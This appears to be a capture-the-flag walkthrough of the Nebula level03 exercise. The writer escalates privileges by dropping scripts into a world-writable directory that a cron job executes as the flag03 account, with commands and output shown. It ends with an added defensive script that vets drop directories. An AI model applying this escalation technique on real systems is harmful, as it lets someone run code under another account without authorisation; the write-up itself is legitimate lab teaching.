Level 03 instructions
About
Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.
Alright, it wants me to start by checking the flag03 home directory.
ls -al /home/flag03
total 6
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
The file writable.sh looks interesting and has execute permissions.
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done
So this loop runs for every file in /home/flag03/writable.d. It uses ulimit to set a max CPU time of 5 seconds, then runs bash -x $i, where i is the name of the file. Finally it deletes the file with rm -f $i. So any file that I put into the writable.d directory should get executed each time the script is run.
I test this by creating a simple script in the writable.d directory. If it runs successfully it should create a new empty file in the /tmp/ directory. Then I run the writable.sh script and see what happens.
echo "touch /tmp/works.tmp" > /home/flag03/writable.d/test.sh
/home/flag03/writable.sh
+ touch /tmp/works.tmp
Now I check my /tmp/ folder to see if the script worked as expected.
Great, so the script is working as expected. The instructions for this level state that there is a crontab job that runs every few minutes, so I create a new script to execute getflag and see if cron runs it as the flag03 account.
echo 'getflag > /tmp/gotflag.txt' >/home/flag03/writable.d/gettheflag.sh
cat /tmp/gotflag.txt
You have successfully executed getflag on a target account
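The level works because writable.sh, run by cron as flag03, executes every file in a directory that any user can write to (drwxrwxrwx). As an added example, not part of the original writeup or the Nebula image, here is a sketch of the checks a job like this needs before it runs anything from a drop directory; the function names are hypothetical, and it assumes the job should only trust files created by the account it runs as.

```shell
#!/bin/sh
# Added example: vetting a drop directory before a scheduled job runs
# anything from it. Function names are hypothetical.

# True if the path is writable by group or by other.
loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null)" ]
}

# True only for a regular file (not a symlink) that is owned by the
# account running this script and that nobody else can modify.
trusted_script() {
    [ -f "$1" ] && [ ! -L "$1" ] && [ -O "$1" ] && ! loosely_writable "$1"
}

# Print the files in a drop directory that are safe to execute.
# Refuse the whole directory if another account owns it or can write
# to it, since such an account could swap files between the check and
# the run (the writable.d situation in this level).
safe_candidates() {
    dir=$1
    if [ ! -O "$dir" ] || loosely_writable "$dir"; then
        echo "refusing $dir: owned or writable by another account" >&2
        return 1
    fi
    for f in "$dir"/*; do
        trusted_script "$f" && printf '%s\n' "$f"
    done
    return 0
}

# Stand-alone use: ./vet_dropdir.sh /path/to/dropdir
if [ "$#" -gt 0 ]; then
    safe_candidates "$1"
fi
```

Run against a directory with the permissions of /home/flag03/writable.d, safe_candidates refuses outright, which is the behaviour the cron job lacked.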